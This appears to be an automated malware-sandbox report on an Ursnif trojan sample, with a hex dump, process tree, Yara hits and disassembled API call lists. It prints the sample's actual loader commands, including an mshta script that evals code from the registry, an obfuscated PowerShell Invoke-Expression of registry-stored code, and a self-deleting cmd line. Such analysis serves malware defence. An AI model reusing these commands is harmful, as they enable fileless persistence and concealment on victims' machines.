6a bb d3 d2 82 2c 91 c4 0a 2e 48 32 f6 04 a4 94 d8 ba d6 89 b4 5b 09 d5 6b 54 11 8b 98 73 26 24 d1 68 bc 3c 20 27 6c 5b a7 b2 63 47 4a d8 6e e2 04 da 17 97 b0 18 45 db da 03 19 16 c7 62 30 10 c4 db c2 36 68 bc 0b 32 e3 62 33 04 59 93 ca 45 8d cc 6b c0 b3 74 59 f4 b3 aa 69 25 00 99 62 4a e6 72 12 59 26 0e 89 0a 46 38 77 84 d7 88 ee 0a a2 30 c6 13 91 f1 9e 97 39 a0 f9 c5 6f a7 f6 f9 37 d6 82 09 48 ec fe 48 99 47 76 55 ff 87 fe 03 2d 24 ec f8 ef 59 35 71 40 63 5a 0f c0 08 c0 8b f7 2e a4 db ed ff 91 8e 4d a9 4b 2c cc 12 ad ca dc 93 7a b3 43 11 23 9d 51 b0 bc 04 7a 86 43 7c be 41 f3 ec 95 d3 8d 10 44 9e ef 4f d1 3f 39 52 bb fd ba 1f 85 d1 f5 10 0b f2 cc e3 34 80 b6 b1 d3 b2 32 79 5a 61 ee b3 db 2d 78 90 06 dd 27 09 6d 1a a9 d7 3b 68 06 2b 51 e8 37 64 6f 76 ab 6b 22 bc 5e 6a 23 99 a3 ff 69 96 ba 18 c4 de 8a 4e a4 44 d5 ce 2e 9d 1b 7b 65 84 e1 e6 8d 03 cb 97 bf 64 a4 2d e2 b2 5e 29 45 2f ef 7c 73 73 91 74 fa 22 a2 ef 15 d8 6e 6e 09 d8 2b 09 34 b4 3c 40 20 94 ee fc fc bf 6c 46 77 69 94 c4 c1 a8 87 f6 3e da 26 96 ff 17 f5 8e a9 39 46 eb d5 c5 b8 b1 ba e9 cb 87 cd 47 49 dd e2 0a ac 88 65 a5 6e e1 ca 3b 35 f9 fb 96 f3 0a ba 02 ab 15 78 ed 40 43 75 df f0 82 f3 db 02 6e 23 5f 8d de 35 c7 c4 68 86 8a 5f 86 fe f1 6b e8 d0 b9 e7 50 4a 3e 35 3e a4 83 e3 9b 59 9e d0 cf 15 9a a4 1d 3c b7 a0 26 bf 82 c4 85 7c 6c 80 8d 0e 28 71 35 ab 2d 6b 0e ec 33 f4 86 8a 57 14 62 be 9f 01 e5 4a 67 75 58 c5 47 1b 0c 8c 41 ac 32 92 39 77 2a ee 89 69 b9 48 1e e1 84 ca 23 7a 77 5d 43 ad c0 b0 41 93 aa 01 84 86 54 fc 2f 43 a4 79 9a 69 b6 f1 33 3a a0 c0 7e 7f e0 68 38 c5 24 cb 33 4f c7 3f 42 b6 32 74 86 68 aa f9 98 9e 9e 44 e4 84 d9 e4 93 32 51 f2
                            Data Ascii: H~Dn*uyX7a}7u+/i])'INP::[2<9p#Z'2`;hA;wPu~x6K~1y3hN!sGEX/POG2?,R&/NB7?HTDZ_I?~v;eu=:P>G"3m<8+?E>R3^$F6s@=lWgGqonW|:G*w[/!u:^Q'Iw^JK}?\3~_Ahkr4rnIlGWT2.2[=j,.H2[kTs&$h< 'l[cGJnEb06h2b3YEktYi%bJrY&F8w09o7HHGvU-$Y5q@cZ.MK,zC#QzC|ADO?9R42yZa-x'm;h+Q7dovk"^j#iND.{ed-^)E/|sst"nn+4<@ lFwi>&9FGIen;5x@Cun#_5h_kPJ>5>Y<&|l(q5-k3WbJguXGA29w*iH#zw]CAT/Cyi3:~h8$3O?B2thD2Q


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:15:47:23
                            Start date:28/04/2022
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll"
                            Imagebase:0x1060000
                            File size:116736 bytes
                            MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:1
                            Start time:15:47:24
                            Start date:28/04/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                            Imagebase:0x1190000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:2
                            Start time:15:47:24
                            Start date:28/04/2022
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                            Imagebase:0xb90000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Target ID:18
                            Start time:15:47:56
                            Start date:28/04/2022
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                            Imagebase:0x7ff69f490000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:20
                            Start time:15:47:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                            Imagebase:0x7ff6ba650000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Target ID:21
                            Start time:15:47:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff647620000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:22
                            Start time:15:48:09
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                            Imagebase:0x7ff625ee0000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:moderate

                            General

                            Target ID:23
                            Start time:15:48:14
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"
                            Imagebase:0x7ff603b80000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:24
                            Start time:15:48:16
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                            Imagebase:0x7ff625ee0000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:moderate

                            General

                            Target ID:25
                            Start time:15:48:18
                            Start date:28/04/2022
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff6f6bd0000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate

                            General

                            Target ID:26
                            Start time:15:48:18
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"
                            Imagebase:0x7ff603b80000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:28
                            Start time:15:48:27
                            Start date:28/04/2022
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff6f3b00000
                            File size:3933184 bytes
                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:32
                            Start time:15:48:44
                            Start date:28/04/2022
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll
                            Imagebase:0x7ff7bb450000
                            File size:273920 bytes
                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:34
                            Start time:15:48:45
                            Start date:28/04/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff647620000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:36
                            Start time:15:48:46
                            Start date:28/04/2022
                            Path:C:\Windows\System32\PING.EXE
                            Wow64 process (32bit):false
                            Commandline:ping localhost -n 5
                            Imagebase:0x7ff701a50000
                            File size:21504 bytes
                            MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:39
                            Start time:15:48:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\RuntimeBroker.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                            Imagebase:0x7ff6b45b0000
                            File size:99272 bytes
                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Reset < >

                              Executed Functions

                              Function 059400DC Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 59400dc-5940125 RtlInitializeCriticalSection call 5939394 3 5940127-594014b memset RtlInitializeCriticalSection 0->3 4 594014d-594014f 0->4 5 5940150-5940156 3->5 4->5 6 594015c-5940180 CreateMutexA GetLastError 5->6 7 5940558-5940562 5->7 8 5940182-5940187 6->8 9 594019d-594019f 6->9 10 5940189-5940196 CloseHandle 8->10 11 594019b 8->11 12 59401a5-59401b0 call 5945261 9->12 13 5940553 9->13 10->13 11->9 15 5940557 12->15 17 59401b6-59401c1 call 5948452 12->17 13->15 15->7 17->15 20 59401c7-59401d9 GetUserNameA 17->20 21 59401fd-594020d 20->21 22 59401db-59401f3 RtlAllocateHeap 20->22 24 5940216-5940233 NtQueryInformationProcess 21->24 25 594020f-5940214 21->25 22->21 23 59401f5-59401fb GetUserNameA 22->23 23->21 27 5940235 24->27 28 5940239-5940248 OpenProcess 24->28 25->24 26 594025d-5940267 25->26 31 59402a4-59402a8 26->31 32 5940269-5940285 GetShellWindow GetWindowThreadProcessId 26->32 27->28 29 5940256-5940257 CloseHandle 28->29 30 594024a-594024f GetLastError 28->30 29->26 30->26 33 5940251 30->33 36 59402bd-59402d4 call 593f01f 31->36 37 59402aa-59402ba memcpy 31->37 34 5940297-594029e 32->34 35 5940287-594028d 32->35 38 59402ed-5940329 call 5949370 call 5946c1e call 595087a 33->38 34->31 40 59402a0 34->40 35->34 39 594028f-5940295 35->39 45 59402d6-59402da 36->45 46 59402e1-59402e7 36->46 37->36 53 594033f-594034e call 593e1b1 38->53 54 594032b-594033a CreateEventA call 594e803 38->54 39->31 40->31 45->46 47 59402dc call 59518c0 45->47 46->15 46->38 47->46 53->15 58 5940354-5940367 RtlAllocateHeap 53->58 54->53 58->15 59 594036d-594038d OpenEventA 58->59 60 59403af-59403b1 59->60 61 594038f-594039e CreateEventA 59->61 63 59403b2-59403d9 call 59473aa 60->63 62 59403a0-59403aa GetLastError 61->62 61->63 62->15 66 5940546-594054d 63->66 67 59403df-59403ed 63->67 66->15 68 59403f3-594040b call 594b6d6 67->68 69 594049f-59404a5 67->69 68->15 87 5940411-5940418 68->87 70 59404a7-59404ac call 595157a call 593708f 69->70 71 59404b1-59404b8 69->71 70->71 71->13 74 59404be-59404c3 71->74 75 59404c5-59404cb 74->75 76 594051f-5940544 call 59473aa 74->76 79 59404cd-59404d4 SetEvent 75->79 80 59404da-59404f0 RtlAllocateHeap 75->80 76->66 88 594054f-5940550 76->88 79->80 84 59404f2-5940519 wsprintfA 80->84 85 594051c-594051e 80->85 84->85 85->76 89 594042c-5940440 LoadLibraryA 87->89 90 594041a-5940426 87->90 88->13 91 5940442-594046a call 594e778 89->91 92 594046f-5940482 call 59481f1 89->92 90->89 91->92 92->15 96 5940488-5940491 92->96 96->71 97 5940493-594049d call 59388fa 96->97 97->71
                              APIs
                              • RtlInitializeCriticalSection.NTDLL(0595A428), ref: 059400FA
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 0594012B
                              • RtlInitializeCriticalSection.NTDLL(05F3C2D0), ref: 0594013C
                                • Part of subcall function 05945261: RtlInitializeCriticalSection.NTDLL(0595A400), ref: 05945285
                                • Part of subcall function 05945261: RtlInitializeCriticalSection.NTDLL(0595A3E0), ref: 0594529B
                                • Part of subcall function 05945261: GetVersion.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452AC
                                • Part of subcall function 05945261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452E0
                                • Part of subcall function 05948452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0594846C
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,05939100,?), ref: 05940165
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940176
                              • CloseHandle.KERNEL32(0000059C,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0594018A
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 059401D3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059401E6
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 059401FB
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0594022B
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940240
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0594024A
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940257
                              • GetShellWindow.USER32 ref: 05940272
                              • GetWindowThreadProcessId.USER32(00000000), ref: 05940279
                              • memcpy.NTDLL(0595A2F4,?,00000018,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059402B5
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05939100,?), ref: 05940333
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0594035D
                              • OpenEventA.KERNEL32(00100000,00000000,05F3B9C8,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940385
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000,05F3B9C8,?,?,?,?,?,?,?,05939100,?), ref: 0594039A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059403A0
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940438
                              • SetEvent.KERNEL32(?,0594C384,00000000,00000000,?,?,?,?,?,?,?,05939100,?), ref: 059404CE
                              • RtlAllocateHeap.NTDLL(00000000,00000043,0594C384), ref: 059404E3
                              • wsprintfA.USER32 ref: 05940513
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: a4a86891c9d55e483ae122ab45e450a2ebae60d04231f423dc8d17c265b078d3
                              • Instruction ID: 32b4732600559984ac806f59c5c8277e29c4c3a837954bebc751fb0ac0db7018
                              • Opcode Fuzzy Hash: a4a86891c9d55e483ae122ab45e450a2ebae60d04231f423dc8d17c265b078d3
                              • Instruction Fuzzy Hash: 2EC19DB0918348DFC720DF65E94ED2ABFE9FB89211B41491DF646CB200DB34A864CF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05938FEC Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 293 5938fec-5938ffe 294 5939000-5939006 293->294 295 5939008 293->295 296 593900e-5939022 call 5947ac9 294->296 295->296 299 5939024-5939032 StrRChrA 296->299 300 593905e-5939088 call 593c431 296->300 301 5939037 299->301 302 5939034-5939035 299->302 307 59390a6-59390ae 300->307 308 593908a-593908e 300->308 304 593903d-5939058 _strupr lstrlen call 5950ee0 301->304 302->304 304->300 309 59390b0-59390b3 307->309 310 59390b5-59390d3 CreateEventA 307->310 308->307 312 5939090-593909b 308->312 313 5939113-593911a 309->313 314 5939107-593910d GetLastError 310->314 315 59390d5-59390dc call 5945e8d 310->315 312->307 316 593909d-59390a4 312->316 319 5939129-593912e 313->319 320 593911c-5939123 RtlRemoveVectoredExceptionHandler 313->320 318 593910f-5939111 314->318 315->314 322 59390de-59390e5 315->322 316->307 316->316 318->313 318->319 320->319 323 59390e7-59390f3 RtlAddVectoredExceptionHandler 322->323 324 59390f8-59390fb call 59400dc 322->324 323->324 326 5939100-5939105 324->326 326->314 326->318
                              APIs
                              • StrRChrA.SHLWAPI(05F3B5B0,00000000,0000005C,?,?,?), ref: 05939028
                              • _strupr.NTDLL ref: 0593903E
                              • lstrlen.KERNEL32(05F3B5B0,?,?), ref: 05939046
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 059390C6
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,0595076B), ref: 059390ED
                              • GetLastError.KERNEL32(?,?,?,?), ref: 05939107
                              • RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 0593911D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: 6640d7ffdf086ae7446846787135d98304609bb0ad1d019a6d0f8a2535db5194
                              • Instruction ID: d5b43c7ad1cfdf5bbc345339728bc0d5ca0e3dddcde5227f0425a14c0b463346
                              • Opcode Fuzzy Hash: 6640d7ffdf086ae7446846787135d98304609bb0ad1d019a6d0f8a2535db5194
                              • Instruction Fuzzy Hash: C6310A72A28311DFDB10AFF8ED8BA6EFFA8BB04211B450565FA12E3140DF7598518B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593C431 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0593C478
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0593C48B
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0593C4A7
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0593C4C4
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 0593C4D1
                              • NtClose.NTDLL(?), ref: 0593C4E3
                              • NtClose.NTDLL(?), ref: 0593C4ED
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 7b06e3c5ea36904f9ebbe6f4347cf8dea3985aeaf690cb25012541c74ea1f96f
                              • Instruction ID: bda6e819035c928e9ecfd7c57a9afd2c98c3460327b1ceda1d02df97687aab43
                              • Opcode Fuzzy Hash: 7b06e3c5ea36904f9ebbe6f4347cf8dea3985aeaf690cb25012541c74ea1f96f
                              • Instruction Fuzzy Hash: 312103B2A10218FBDB01AFA4CC4AAEEBFBDFF48750F114022F905F6111D7719A509BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05946DE0 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 391 5946de0-5946e09 392 5946e2d-5946e35 391->392 393 5946e0b-5946e12 391->393 395 5946e38-5946e3d 392->395 393->392 394 5946e14-5946e2b 393->394 394->395 396 5946e3f-5946e46 395->396 397 5946e4b-5946e53 395->397 398 59470ba-59470c0 396->398 399 5946e55-5946e64 call 5939394 397->399 400 5946e8d-5946e94 397->400 411 5946e66-5946e6d 399->411 412 5946e72-5946e8a call 5933368 399->412 401 5947084-594708b 400->401 402 5946e9a-5946ea7 400->402 406 594705d-5947061 401->406 402->401 404 5946ead-5946eba 402->404 407 5946ec0-5946ec8 404->407 408 5946ffe 404->408 409 5947063-594706b NtUnmapViewOfSection 406->409 410 594706f-5947071 406->410 413 5947005-594700c 407->413 414 5946ece-5946eff call 5948f62 407->414 408->413 409->410 415 5947073-5947078 410->415 416 594709c-59470a0 410->416 411->416 412->400 413->416 427 5946f05-5946f2d call 594be80 414->427 428 594705a 414->428 420 594708d-5947092 NtClose 415->420 421 594707a-594707e 415->421 416->398 418 59470a2-59470b5 memset call 594e803 416->418 418->398 426 5947096-5947097 call 594e803 420->426 421->420 425 5947080-5947082 421->425 425->416 426->416 427->428 432 5946f33-5946f46 call 5941ce4 427->432 428->406 432->428 435 5946f4c-5946f51 432->435 436 5946f61-5946f66 435->436 437 5946f53-5946f5e memcpy 435->437 438 5946f90-5946fb3 memcpy 436->438 439 5946f68-5946f70 436->439 437->436 441 5946fb5-5946fc3 438->441 442 5946fc6-5946fca 438->442 439->438 440 5946f72-5946f8e 439->440 440->438 440->440 441->442 443 5946fe2-5946fe6 442->443 444 5946fcc-5946fdf 442->444 445 5947011-5947012 call 593c4fb 443->445 446 5946fe8-5946fef 443->446 444->443 449 5947017-594701c 445->449 